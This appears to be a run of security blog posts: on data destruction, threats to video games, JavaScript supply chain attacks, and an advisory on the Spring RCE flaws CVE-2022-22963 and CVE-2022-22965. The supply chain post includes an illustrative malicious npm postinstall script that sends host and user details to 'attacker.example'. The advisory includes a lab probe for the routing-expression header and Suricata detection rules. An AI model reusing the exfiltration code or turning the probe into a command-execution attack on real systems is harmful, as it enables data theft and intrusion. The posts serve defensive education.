Data destruction is a process that involves destroying information and records such as paper documents and digital information stored on hard drives, SSDs, optical disks, memory chips, and the like. The goal of digital data destruction is to eliminate any information that was previously held on the server or hardware so that it can’t ever be recovered by a third party or someone from within the organization. 

The increased cybersecurity events of 2020 and 2021 have highlighted the need for proper data destruction protocols across industries. Additionally, emphasizing the circular economy, sustainability, and eco-friendly practices means that more refurbished devices will be recycled and resold to new owners. If data is not completely destroyed, then that information is at risk. 

What happened at Morgan Stanley?

A lack of secure data destruction protocols can have profound implications. 

In 2016, Morgan Stanley hired a vendor to wipe all data from the servers. But they didn’t monitor their vendor or keep adequate documentation. As a result, the vendor failed to completely erase all the data from the hardware before selling it to recyclers. 

In 2019, a few of Morgan Stanley’s decommissioned servers went missing, and the disks were left with unencrypted customer data. This incident was attributed to a software flaw but still reflects a lack of oversight over one of the most critical business data practices.

These data flubs could have had a significant impact on the online privacy of their clients, but the bank maintains that none of their customers’ data was breached in either instance. Still, the data left on these devices could have easily been accessed by anyone in possession of the servers and other hardware. 

A person with sensitive customer information such as account and social security numbers, birthdates, contact information, and other crucial data could wreak havoc on customers and the organization as a whole. 

Benefits of secure data destruction

Improper data destruction protocols can leave customer and business data wide open to be stolen and used for malicious intentions. 

Businesses of all sizes need to ensure that their financial statements and documents such as profit and loss statement templates, invoices, third-party data, and everything in between are all safely secured using the correct data destruction activities. 

Here are just a few of the benefits of secure and certified data destruction policies and practices:

  • Complete removal of data — certified data destruction helps remove data from hardware without leaving a single trace of its existence. A simple delete is not enough to completely remove data from a device. Data destruction protects the data and the device owner.
  • DARP — Even encryption and firewall security are not enough to ensure that your data at rest is protected. Data at Rest Protection (DARP) through data destruction is the most secure way to protect data that is no longer in use and isn’t serving any real purpose.
  • Prevent cybersecurity incidents — Devices that are no longer needed, both business and personal, have to be permanently wiped with a certified data destruction tool that meets data erasure standards. Without it, they could be vulnerable to a breach resulting in financial and reputational losses, including fines and penalties.
  • Meet compliance and regulation guidelines — Data protection laws worldwide such as GDPR, SOX, and HIPAA state clear rules for consumers’ right to erasure and to be forgotten. Data destruction policies ensure that these guidelines are met. 
  • Sustainable hardware refurbishing — Reducing e-waste has become a top priority as the circular economy comes into focus. Old devices like smartphones and laptops are not the only ones businesses can recycle. A new emphasis on recycling servers and other hardware means an increased need for complete data destruction. 

Methods for data destruction

Organizations use many methods to destroy data at rest permanently. Media wiping tools are essential for companies that use refurbished IT assets or recycle their hardware. These electronic devices must all be adequately wiped before safely passing on to their next owner: 

  • Computers
  • Smartphones
  • Tablets
  • Digital cameras
  • Media players
  • Printers
  • Monitors
  • Hard drives
  • Gaming consoles
  • External hardware
  • Peripheral devices

Secure and dispose of electronic devices, servers, and hardware by using these data destruction methods:

Delete or reformat

The two most common ways to attempt to rid a device of its data are by deleting or reformatting files. 

Deleting a file from a device will remove it, but it doesn’t destroy the data. The information within the deleted file will remain on the device’s hard drive or memory chip.

Reformatting the disk produces similar results. Reformatting will not wipe the data from the device; it just replaces the existing file system with a brand new one.

These methods are ineffective and do not represent proper data destruction, but they are worth mentioning since they are often used as a first response.

Wipe

Data wiping involves overwriting data on a device so that no one can read it. It is usually accomplished by connecting the affected media to a wiping device, but it can also be done internally. 

However, data wiping is time-consuming, especially for a business with lots of information across numerous devices. It’s a more practical approach for individuals. 

Overwriting data

Overwriting data and wiping data are very similar approaches to data destruction. Overwriting data refers to writing a pattern of ones and zeroes over the current data to hide it and prevent it from being read. 

However, if the data in question is a high security risk, it may be worth taking a few extra passes at overwriting it. This ensures that the data is completely destroyed and that no bit shadow or remnant of the pre-existing information can be detected.

Overwriting data is by far the most common data destruction method used by organizations, but it is also very time-consuming. Additionally, you can only overwrite data on an undamaged device that still allows data to be written into it. 
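
A minimal sketch of the technique appears below, with an important caveat: wear leveling on SSDs and journaling or copy-on-write filesystems can leave remnants behind, so certified erasure tools or physical destruction remain the stronger options for high-risk data:

```python
# Sketch: overwrite a file with random bytes across several passes, then delete it.
import os
import secrets

def overwrite_and_delete(path: str, passes: int = 3, chunk: int = 1024 * 1024) -> None:
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            remaining = size
            while remaining > 0:
                n = min(chunk, remaining)
                f.write(secrets.token_bytes(n))
                remaining -= n
            f.flush()
            os.fsync(f.fileno())  # push each pass down to the device
    os.remove(path)

overwrite_and_delete("customer_export.csv")  # hypothetical file
```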

Erasure

Another term for overwriting, complete erasure destroys all data stored on a hard drive and delivers a certificate of destruction. This certificate proves that data has been successfully erased from an electronic device. 

Erasure is a suitable method for businesses that purchase equipment such as desktops, enterprise data centers, and laptops off-lease.

Degaussing

Degaussing uses a high-powered magnet to destroy data. It is a quick and effective method to destroy sensitive data, but it has some disadvantages. 

Once a device has been degaussed, its hard drive is no longer operable. Besides that, there is no way to know whether all the data has been destroyed without an electron microscope. 

Physical destruction

It turns out that taking a hammer to a hard drive is a very effective data destruction method for businesses of all sizes. However, not all companies can afford to spend money on replacing hard drives that have been pummeled in the name of data privacy, so this is not always an ideal solution. 

Shredding 

Another method similar to physical destruction, shredding is the most secure and cost-effective data destruction strategy. Shredding involves reducing electronic devices to tiny pieces, no larger than a couple of millimeters. 

This method is ideal for high-security environments and is most commonly used when an organization has a stockpile of old media to destroy. 

Final thoughts

Many businesses will outsource their data destruction needs to a dedicated data destruction company. But beware, just like in Morgan Stanley’s case, you could still be held responsible for any data that remains. 

You may think that your organization isn’t susceptible to a major data breach from decommissioned data centers and other equipment. However, small businesses are the number one target for cybersecurity breaches. 

That’s why businesses of all sizes must take the correct steps to destroy data and ensure their customers’ information stays secure.

The post Formulating proper data destruction policies to reduce data breach risks appeared first on Cybersecurity Insiders.

This blog was written by an independent guest blogger.

The technical infrastructure of video games requires a significant level of access to private data, whether through client-server side interactions or financial data. This has led to what Computer Weekly describes as a ‘relentless’ attack on the video game industry, with attacks against game hosts and customer credentials rising 224% in 2021. There are several techniques for managing a personal online presence in a way that deters cyber attacks, but the ever-broadening range of games and communication tools used to support gaming communities means these threats are only increasing, and they are starting to affect even single-player games.

Gaming exploits

Gaming hacks and exploits are nothing new. There has long been an industry around compromising game code integrity and releasing games for free, then distributing malicious software within those games to breach private user details and exploit them for the hacker’s gain. These attacks have become less common in recent years thanks to greater awareness of online data hygiene, but the risks do remain.

In July, NintendoLife highlighted one particularly notorious hack of the Legend of Zelda series that was sold unlawfully and earned its creator over $87,000 in revenue. This exploit showed a common route to tricking customers: deception. Zelda has a notably strong community where fans help each other out, both in learning the game and in defending against common exploits; this is why the malicious actor in question was discovered and why no further harm was done, but it remains a risk. Awareness is often key to avoiding attempted cyber attacks.

Web services to apps

Video games have become increasingly merged with web services and this, too, is raising the risk of attack. According to CISO mag, a majority of the attacks targeting video game services were conducted via SQL injection, a popular form of web service attack that attempts to breach databases. This, in turn, can result in the extraction of private customer details and financial information.

Games have previously sought to use their own platforms for registration and payments. However, in recent years, and especially with the growth of gaming platforms – such as Battle.net, Steam and EA Origin – user account details are made more vulnerable through their hosting via web services. This is a worrying development when considering the ultimate interface of video gaming, web services, and virtual reality – the up-and-coming Metaverse.

The Metaverse

The Metaverse is a descriptor for an interlinked series of digital worlds that will come together into one VR-powered reality. Pioneered most recently by Mark Zuckerberg and his Meta company, it is considered the future of communication and casual video gaming. According to Hacker Noon, the Metaverse is at unique risk of being subjected to serious cyber attacks.

The Metaverse is unique in that it will require digital currencies to operate. It is envisioned as a world within a world – not simply a service you pay for and then access, but an area where you will actively live and play. That means persistent financial data and constant access to privileged private information. Furthermore, individuals play themselves in the Metaverse; not a created character. One successful attack could claim a significant amount of data from any single user of the Metaverse, making it the ideal target for a new generation of cyber attacks.

In short, the protections that will come up for the Metaverse need to be absolutely world-class. Collaboration is required, and a strong culture of individual diligence and digital hygiene, too. Putting these principles in place today will help to protect the Metaverse before it really gets big, and protect video gamers too.

The post Cyber threats increasingly target video games – The metaverse is next appeared first on Cybersecurity Insiders.

In open source we trust

JavaScript code, used in 98% of all global websites, is a notable contributor to the ongoing software supply chain attack problems. In fact, vulnerable or malicious JavaScript is likely responsible for a sizable portion of the increase in attacks during 2021. With much of the JavaScript code that drives websites originating from open-source libraries, organizations need to understand how open source contributes to JavaScript supply chain issues, and what they need to do to protect their business and their customers.

What’s going on with the supply chain?

Often called one of the most insidious and dangerous forms of hacking, software supply chain attacks can devastate businesses. In addition to the immediate effects of an attack, such as operational delays, system infiltration, and the theft of sensitive credentials or customer data, the long-term consequences can be significant. Regulatory fines, compliance concerns, reputation damage, attacks on connected businesses, and lost customers are often the consequences of a supply chain attack.

Software supply chain attacks currently dominate the headlines, with recent industry research reporting a 300% increase in 2021. The research found that threat actors tend to focus on open source vulnerabilities and code integrity issues to deliver attacks. In addition, researchers discovered a low level of security across software development environments, with every company examined having vulnerabilities and misconfigurations.

Another industry report discovered a 650% increase over the course of one year in supply chain attacks aimed at upstream public repositories, the objective being to implant malware directly into open source projects to infiltrate the commercial supply chain.

A common thread in all of this is JavaScript—an inherently insecure coding language and one that is often found in open source projects.

Open-source JavaScript: A focal point for attack

Why the software supply chain has become a focal point for threat actors is a question on quite a few minds. The answer comes down to what is easy and most profitable. Software is imperfect. Vulnerabilities and flaws make it ripe for attack. And a connected supply chain ensures a large attack surface. Add to this the prevalent use of the JavaScript programming language and open-source JavaScript libraries, which often contain flawed, and sometimes malicious, third- or fourth-party code, and businesses become ground zero for JavaScript supply chain attacks.

JavaScript serves as one of the core technologies used to build web applications and websites. As mentioned previously, over 98% of websites use it for client-side web page behavioral elements. Additionally, 80% of websites use open-source or a third-party JavaScript library as part of their web application. The Stack Overflow 2021 Developer Survey found that JavaScript remains the most popular programming language with 65% of professional developers using it. Unfortunately, JavaScript wasn’t built with security in mind, making it extremely vulnerable to attack. JavaScript allows threat actors to deliver malicious scripts to run on both the front end and the back end of a system, affecting businesses, employees, and customers alike.

In addition, because there is little to no oversight in open-source libraries, vulnerabilities and malicious scripts can often lie unnoticed for months or even years.

The security firm WhiteSource recently highlighted the problems with open-source libraries and JavaScript, identifying more than 1,300 malicious packages in the most commonly downloaded JavaScript package repository.

What do JavaScript supply chain attacks look like?

As we mentioned earlier, JavaScript was not built with security in mind. Since there are no security permissions built into the JS framework, it is difficult to keep JavaScript code safe from attack. The most common JavaScript security vulnerabilities include:

  • Source code vulnerabilities
  • Input validation
  • Reliance on client-side validation
  • Unintended script execution
  • Session data exposure
  • Unintentional user activity

JavaScript supply chain attacks can take on one of three different forms: attacking the developer directly; embedding the attack on the back end; or embedding the attack on the front end.

Let’s play attack the developer!

The recent news of malicious activity found in npm, the most popular JavaScript package manager, made international headlines. JavaScript package managers are designed to help developers automate any dependencies associated with a development project. Package managers enable automatic installation of new packages or updates to existing packages with a single command. They’re hugely popular, with new packages released constantly, making them difficult to monitor. Since npm is open source, anyone can submit JavaScript packages, even bad actors who intentionally include malicious scripts in their packages.

Package managers install files directly on the developer's machine, which means threat actors can gain almost instant access to a developer's device and, potentially, the entire system and network. According to WhiteSource, the organization that discovered the malicious npm packages, much of the malicious activity involved embedding malicious files on developer machines to carry out the 'reconnaissance' phase of an attack (as defined in the MITRE ATT&CK framework), that is, active or passive information gathering. Researchers also discovered that 14% of the packages were designed to steal sensitive information, such as credentials.
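
As an illustration of the mechanism (not of any specific package from the study), a hypothetical malicious npm package only needs a lifecycle script in its package.json, such as "postinstall": "node index.js", to execute arbitrary JavaScript on the developer's machine the moment the package is installed:

// index.js of a hypothetical malicious package; npm runs it automatically
// during `npm install` via the postinstall lifecycle script declared above.
const os = require('os');
const https = require('https');

// Reconnaissance: gather basic host and user details.
const recon = JSON.stringify({
  host: os.hostname(),
  platform: os.platform(),
  user: os.userInfo().username,
});

// Send the data to an attacker-controlled endpoint (placeholder hostname).
const req = https.request({ host: 'attacker.example', path: '/collect', method: 'POST' });
req.on('error', () => {}); // fail silently so the install looks normal
req.end(recon);

Running installs with npm's --ignore-scripts option, and reviewing the lifecycle scripts of new dependencies, blunts this particular vector.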

Researchers found that threat actors designed these malicious packages to look legitimate by using the names of well-known and popular npm packages and emulating their source code. Malicious files observed in the study included obfuscated JavaScript and binaries disguised as JavaScript components.

The researchers in the WhiteSource study also found that, in some instances, once developers downloaded the files, one of the binaries would download a third-party file designed to interact with the Windows Registry to collect system and configuration information. The malicious file would also try to establish a connection with a remote host to enable remote code execution (RCE). The fake JavaScript files also included examples of Cobalt Strike, a tool used by red teams and penetration testers to simulate attacks. According to researchers, the ultimate goal of this malicious software appeared to be mining cryptocurrency directly on the developer's machine.

While threat actors did not appear to target specific industries or companies, they did design malicious packages to target certain systems. Researchers also discovered malicious JavaScript packages that used typosquatting, dependency confusion, code obfuscation, and other types of attack techniques.

Back-end JavaScript threats

JavaScript frameworks commonly used for server-side development, or the back end of a web application, are also highly susceptible to attack. As we mentioned earlier, JavaScript wasn't built with security in mind, making it an easy target. Any vulnerability in back-end JavaScript source code gives threat actors an easy way to infiltrate systems, install malicious files, and execute attacks. Risks include security misconfigurations, which can enable access to the back end; insecure back-end application design; vulnerable or outdated components; and server-side request forgery (SSRF). Examples of threats include SQL injection for back-end database manipulation, SSRF, and cross-site scripting (XSS).
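
To make the injection risk concrete, here is a brief sketch in Node.js (using the widely used mysql2 driver; the table and field names are hypothetical). Concatenating user input into a query hands control of its logic to the attacker, while a parameterized query does not:

const mysql = require('mysql2/promise'); // assumed driver; any driver with bound parameters works the same way

async function findUser(db, username) {
  // VULNERABLE: a username such as ' OR '1'='1 rewrites the query's logic.
  // const [rows] = await db.query(
  //   "SELECT * FROM users WHERE name = '" + username + "'");

  // SAFER: the placeholder lets the driver escape the value for us.
  const [rows] = await db.query('SELECT * FROM users WHERE name = ?', [username]);
  return rows;
}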

Front-end JavaScript threats

Front-end, or client-side, code is executed within the browser, which often lacks the rigorous security controls that protect the back end of web applications. Vulnerable code on the client side is all the more dangerous because most organizations today have little visibility into, or control over, what runs there. Since many web applications are written in JavaScript and operate on the client side, web users, such as bank or e-commerce customers, become vulnerable to attacks like Magecart, e-skimming, sideloading, cross-site scripting (XSS), and formjacking.

Protect the complete attack surface with these three key steps

To fully manage the risk of breaches and attacks, companies must simultaneously protect both the client side and the back end of their application portfolios. This includes anything accessed by the developer, anything written in JavaScript on the back end, and the web assets that the customer can see (e.g., text and images) and interact with.

One of the most important actions any business can take is protecting its customers from JavaScript threats. Unfortunately, because of the sophisticated and subtle nature of these attacks, they can be hard to detect until it's too late. To offer a safe and secure digital experience, businesses must be diligent about securing their websites and web applications from dangerous client-side JavaScript attacks.

To protect the client-side attack surface, businesses should apply these three best practices:

  • Review third-party code during software development: Third-party JavaScript is a great way to avoid the time and money associated with developing your own code, but third-party scripts can also contain vulnerabilities or intentional malicious content. Always inspect third- and fourth-party additions for vulnerabilities, and pin the scripts you do trust to reviewed versions (see the Subresource Integrity sketch after this list).
  • Perform automated client-side attack surface monitoring: Inspection activities are critical, but also time consuming if you don’t have an automated solution to review JavaScript code. A purpose-built solution, like Feroot’s Inspector offered in AT&T Managed Vulnerability Program’s Client-side Security Solution, that automates the process can be a fast and easy way to identify malicious script activity.
  • Identify software supply chain risks: Assess and know what third-party code is being used across your web application's client side.
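
One lightweight control that pairs well with code review is Subresource Integrity (SRI), which makes the browser refuse to run a third-party script whose content no longer matches the hash you recorded. A minimal sketch follows; the URL and digest are placeholders, not real values:

// Load a third-party script with an integrity pin; if the hosted copy is
// tampered with, the hash check fails and the browser refuses to execute it.
const script = document.createElement('script');
script.src = 'https://cdn.example/vendor-widget.min.js'; // hypothetical third-party script
script.integrity = 'sha384-REPLACE_WITH_REAL_DIGEST';    // placeholder digest of the reviewed version
script.crossOrigin = 'anonymous';                        // CORS is required for SRI on cross-origin loads
document.head.appendChild(script);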

Improve your JavaScript supply chain security

JavaScript carries risk. The only way to avoid your business and your customers becoming victims of a JavaScript attack is to apply JavaScript security best practices to your website and web application development process.

The services offered by AT&T’s Managed Vulnerability Program (MVP) allow the MVP team to inspect and monitor customer web applications for malicious JavaScript code that could jeopardize customer and organization security.

AT&T is helping customers strengthen their cybersecurity posture and increase their cyber resiliency by enabling organizations to align cyber risks to business goals, meet compliance and regulatory demands, achieve business outcomes, and be prepared to protect an ever-evolving IT ecosystem.

To learn more about JavaScript security, check out Feroot’s comprehensive Education Center to read more on terminologies, technologies, and threats.

The post JavaScript supply chain issues appeared first on Cybersecurity Insiders.

This blog was written jointly with Eduardo Ocete.

Executive summary

Several vulnerabilities in the Java Spring framework were disclosed in the last few hours and have been compared to the vulnerability that caused the Log4Shell incident at the end of 2021. However, as of the publishing of this report, the still ongoing disclosures and events around these vulnerabilities suggest they are not as severe as their predecessor.

Key takeaways:

  • A vulnerability in Spring Cloud Function (CVE-2022-22963) allows adversaries to perform remote code execution (RCE) with only an HTTP request, and the vulnerability affects most unpatched systems. Spring Cloud Function is a project that provides developers with cloud-agnostic tools for microservice-based architecture, cloud-native development, and more.
  • A vulnerability in Spring Core (CVE-2022-22965) also allows adversaries to perform RCE with a single HTTP request. For the leaked proof of concept (PoC) to work, the application must run on Tomcat as a WAR deployment, which is not the default configuration and lowers the number of vulnerable systems. However, the nature of the vulnerability is more general, so there could be other exploitable scenarios.

In accordance with the Cybersecurity Information Sharing Act of 2015, AT&T is sharing the cyber threat indicator information provided herein exclusively for a cybersecurity purpose to combat cybersecurity threats.

Analysis

At the end of March 2022, several members of the cybersecurity community began spreading news about a potential new vulnerability in Java Spring systems, one said to be easily exploitable, to affect millions of systems, and to have the potential to cause a new Log4Shell-scale incident.

First, it is important to clarify that the comparisons made at this point appear to be aimed at sensationalism and spreading panic rather than at providing actionable information. Additionally, two similar vulnerabilities in the Spring framework were disclosed around the same time, adding confusion to the mix. What the AT&T Alien Labs™ threat intelligence team has observed as of the publishing of this article is included below.

Spring Cloud Function (CVE-2022-22963)

A vulnerability in Spring Cloud Function has been identified as CVE-2022-22963, and this vulnerability can lead to remote code execution (RCE). The following Spring Cloud Function versions are impacted:

  • 3.1.6
  • 3.2.2
  • Older unsupported versions are also affected

In addition to the vulnerable version, JDK >= 9 must be in use in order for the application to be vulnerable.

The vulnerability is triggered when the routing functionality is in use. By providing a specially crafted Spring Expression Language (SpEL) expression as a routing expression, an attacker can access local resources and execute commands on the host. In other words, this CVE allows an HTTP request header named spring.cloud.function.routing-expression, carrying a SpEL expression, to be evaluated through the StandardEvaluationContext, leading to arbitrary RCE.

Figure 1. Exploitation attempt.
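
To make the shape of the request concrete, here is a minimal probe sketch in Node.js. It assumes the default routing endpoint and uses a deliberately harmless SpEL expression; only run anything like this against a lab system you are authorized to test:

// probe.js: sends the crafted routing-expression header to a local lab instance.
const http = require('http');

const body = 'test'; // the body content is irrelevant to the vulnerability
const req = http.request({
  host: 'localhost',       // placeholder: a deliberately vulnerable lab app
  port: 8080,
  path: '/functionRouter', // default endpoint exposed by the routing functionality
  method: 'POST',
  headers: {
    // A harmless SpEL expression for testing; real attacks substitute
    // expressions that reach Runtime.exec() here.
    'spring.cloud.function.routing-expression': 'T(java.lang.Math).random()',
    'Content-Type': 'text/plain',
    'Content-Length': Buffer.byteLength(body),
  },
}, (res) => console.log('HTTP status:', res.statusCode));
req.end(body);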

The vulnerability has been assigned a CVSS score of 9.0, which indicates critical severity. Exploitation may lead to a total compromise of the host or the container, so patching is highly advised. To mitigate the vulnerability, developers should update Spring Cloud Function to the newest versions, 3.1.7 and 3.2.3, where the issue has been patched.

AT&T Alien Labs has identified several exploitation attempts, which we believe are researchers trying to gauge how prevalent the vulnerability actually is, since the attempts carried canary tokens as their payload. Nevertheless, the team will continue to closely monitor the activity as new scanning appears.

Spring Core (CVE-2022-22965)

A vulnerability in Spring Core was tweeted by one of the researchers who first disclosed the Log4Shell vulnerability; the researcher then rapidly deleted the tweet. The vulnerability was originally published without an associated CVE and is being publicly referred to as "Spring4Shell." One of the first observed proofs of concept (PoC) was shared by vx-underground on March 30, 2022. It works against Spring's sample code "Handling Form Submission" and consists of a single POST request carrying in its payload a JSP webshell that is dropped on the vulnerable system.

Figure 2. Exploitation attempt following the PoC.

Spring has confirmed the vulnerability and has stated that the leak occurred ahead of the CVE publication. The vulnerability has been assigned CVE-2022-22965. As per Spring:

“…The vulnerability impacts Spring MVC and Spring WebFlux applications running on JDK 9+. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.”

From the statement above, the specific scenario for the leaked PoC to work would have to match the following conditions:

  • JDK >=9
  • Apache Tomcat as the Servlet container
  • Packaged as WAR
  • spring-webmvc or spring-webflux dependency

However, the scope of the vulnerability is wider, and there could be other exploitable scenarios.

Spring has released new versions of the Spring Framework addressing the vulnerability, so updating to versions 5.3.18 and 5.2.20 (already available in Maven Central) should be a priority in order to mitigate the RCE. New versions of Spring Boot with the patch for CVE-2022-22965 are still under development.

As an alternative mitigation, the suggested workaround is to extend RequestMappingHandlerAdapter to update the WebDataBinder at the end, after all other initialization. To do so, a Spring Boot application can declare a WebMvcRegistrations bean (Spring MVC) or a WebFluxRegistrations bean (Spring WebFlux). The "Suggested Workarounds" section of the Spring statement includes an example implementation of this workaround.

According to a publication by Peking University, this vulnerability has been observed being exploited in the wild. However, AT&T Alien Labs has not identified heavy scanning activity for this vulnerability on our honeypots, nor any exploitation attempts.

Finally, and just to provide a graphical representation of these vulnerabilities, below is a diagram shared by a CTI researcher from Sophos.

Figure 3. Java Spring vulnerability diagram.

Conclusion

Log4Shell was very impactful at the end of 2021 because of the number of exposed vulnerable devices and the ease of its exploitation. These recently disclosed Java Spring vulnerabilities recall the lessons the cyber community learned during that incident, and they have accordingly received a quick response from the entire cybersecurity community, which is collaborating and sharing available information as soon as possible.

Alien Labs will keep monitoring the situation and will update the corresponding OTX Pulses to keep our customers protected.

Appendix A. Detection methods

The following associated detection methods are in use by Alien Labs. They can be used by readers to tune or deploy detections in their own environments or for aiding additional research.

SURICATA IDS SIGNATURES

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"AV EXPLOIT Spring Cloud RCE (CVE-2022-22963)"; flow:established,to_server; content:"POST"; http_method; content:"spring.cloud.function.routing-expression"; http_header; pcre:"/(getRuntime|getByName|InetAddress|exec)/HR"; reference:url,sysdig.com/blog/cve-2022-22963-spring-cloud; classtype:attempted-admin; sid:4002725; rev:1;)

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"AV INFO Spring Core RCE Scanning Activity (March 2022)"; flow:established,to_server; content:"POST"; http_method; content:"class.module.classLoader.resources.context.parent.pipeline.first.pattern"; http_client_body; startswith; reference:url,github.com/TheGejr/SpringShell; classtype:attempted-admin; sid:4002726; rev:1;)

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"AV EXPLOIT Spring Cloud RCE (CVE-2022-22963)"; flow:established,to_server; content:"POST"; http_method; content:"spring.cloud.function.routing-expression"; http_header; pcre:"/(getRuntime|getByName|InetAddress|exec)/HR"; reference:url,sysdig.com/blog/cve-2022-22963-spring-cloud; classtype:attempted-admin; sid:4002727; rev:1;)

AGENT SIGNATURES

Java Process Spawning Scripting Process

Java Process Spawning WMIC

Java Process Spawning Scripting Process via Commandline (For Jenkins servers)

Suspicious process executed by Jenkins Groovy scripts (For Jenkins servers)

Suspicious command executed by a Java listening process (For Linux servers)

Appendix C. Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

  • TA0001: Initial Access
    • T1190: Exploit Public-Facing Application

Appendix D. Reporting context

The following source was used by the report author(s) during the collection and analysis process associated with this intelligence report.

1. AT&T Alien Labs Intelligence and Telemetry

Alien Labs rates sources based on the Intelligence source and information reliability rating system to assess the reliability of the source and the level of confidence we place on the information distributed. The following scales contain the range of possibilities, and the rating applied to this report is A1.

Source reliability

  • A – Reliable: No doubt about the source's authenticity, trustworthiness, or competency. History of complete reliability.
  • B – Usually Reliable: Minor doubts. History of mostly valid information.
  • C – Fairly Reliable: Doubts. Provided valid information in the past.
  • D – Not Usually Reliable: Significant doubts. Provided valid information in the past.
  • E – Unreliable: Lacks authenticity, trustworthiness, and competency. History of invalid information.
  • F – Reliability Unknown: Insufficient information to evaluate reliability. May or may not be reliable.

Information reliability

  • 1 – Confirmed: Logical, consistent with other relevant information, confirmed by independent sources.
  • 2 – Probably True: Logical, consistent with other relevant information, not confirmed.
  • 3 – Possibly True: Reasonably logical, agrees with some relevant information, not confirmed.
  • 4 – Doubtfully True: Not logical but possible, no other information on the subject, not confirmed.
  • 5 – Improbable: Not logical, contradicted by other relevant information.
  • 6 – Cannot Be Judged: The validity of the information cannot be determined.

Feedback

AT&T Alien Labs welcomes feedback about the reported intelligence and delivery process. Please contact the Alien Labs report author or labs@alienvault.com.

The post Java Spring vulnerabilities appeared first on Cybersecurity Insiders.